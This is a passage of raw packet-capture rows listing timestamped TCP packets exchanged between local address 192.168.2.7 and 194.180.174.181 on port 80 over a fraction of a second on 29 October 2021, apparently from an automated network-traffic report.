                                                                                                                          Oct 29, 2021 17:07:34.654081106 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.654119015 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.654156923 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.654158115 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.654195070 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.654231071 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.654233932 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.654329062 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.654366970 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.654369116 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.654668093 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655160904 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655205965 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655245066 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655263901 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655282021 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655318975 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655322075 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655358076 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655397892 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655436993 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655436993 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655478954 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655514956 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655518055 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655554056 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655591965 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655592918 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655627966 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655667067 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655678034 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655700922 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655705929 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655746937 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655786037 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655797005 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655822992 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655862093 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655899048 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.655899048 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655931950 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.655936003 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656166077 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656203985 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656207085 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.656243086 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656332016 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656371117 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656377077 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.656410933 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.656413078 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656450033 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656486034 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.656488895 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656528950 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656563997 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.656569004 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.657030106 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.657433033 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657474041 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657485008 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.657511950 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657551050 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657562971 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.657591105 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657628059 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657666922 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657669067 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.657707930 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657746077 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657747030 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.657784939 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657823086 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657828093 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.657861948 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657900095 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.657902002 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657938957 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.657974958 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.657975912 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.658015966 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.658051968 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.658056021 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.658090115 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.658127069 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.658128977 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.658165932 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.658205032 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.658205986 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.658590078 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.660692930 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.660727978 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.660759926 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.660772085 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.660794020 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.660825968 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.660845041 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.660898924 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.660953045 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.662307978 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.665306091 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.665339947 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.665371895 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.665397882 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.665420055 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666114092 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666150093 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666182995 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666196108 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666215897 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666249037 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666259050 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666281939 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666313887 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666325092 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666347027 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666378021 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666410923 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666420937 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666444063 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666450024 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666479111 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666513920 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666544914 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666563988 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666579008 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666599989 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666611910 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666642904 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666675091 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666683912 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666707993 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666712999 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666740894 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666774035 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666779041 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666805029 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666837931 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666842937 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666871071 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666903019 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666912079 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.666935921 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666968107 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.666979074 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667001009 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667036057 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667066097 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667076111 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667098999 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667117119 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667131901 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667162895 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667185068 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667195082 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667227030 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667258978 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667263985 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667292118 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667296886 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667336941 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667371035 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667373896 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667403936 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667434931 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667444944 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667469025 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667501926 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667532921 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667546988 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667567015 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667572021 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667598963 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667630911 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667646885 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667665005 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667695045 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667701960 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667730093 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667762995 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667766094 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667795897 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667828083 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667834044 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667860985 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667893887 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667901039 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667928934 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667959929 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.667983055 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.667993069 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668028116 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668032885 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668060064 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668092012 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668123960 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668128967 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668159008 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668160915 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668191910 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668221951 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668226957 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668253899 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668286085 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668315887 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668329000 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668348074 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668358088 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668380976 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668412924 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668447018 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668452978 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668478966 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668488026 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668512106 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668545008 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668575048 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668582916 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668606997 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668616056 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668639898 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668672085 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668704033 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668713093 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668735027 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668744087 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.668767929 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.668859959 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.695499897 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.695540905 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.695580006 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.695595026 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.696610928 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.696650028 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.696687937 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.696712017 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.696746111 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.696839094 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.696903944 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.696943998 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.696968079 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.696988106 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697031975 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.697129011 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697169065 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697206020 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697243929 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697273016 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.697289944 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697295904 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.697412014 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697455883 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697467089 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.697495937 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697532892 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697571039 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697608948 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697618961 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.697649956 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697690010 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697725058 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697735071 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.697768927 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.697853088 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697890997 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697926998 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.697964907 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698003054 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698029041 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.698048115 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698163986 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.698168993 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698208094 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698245049 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698282957 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698292971 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.698318005 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.698357105 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698396921 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698523045 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.698527098 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698566914 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698606968 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698638916 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.698643923 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698692083 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.698770046 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698808908 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698844910 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698883057 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.698895931 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.698934078 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.699007034 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699044943 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699115038 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.699373007 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699413061 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699450016 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699470043 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.699490070 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699527979 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699563026 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699604988 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.699608088 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699731112 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699768066 CEST8049845194.180.174.181192.168.2.7
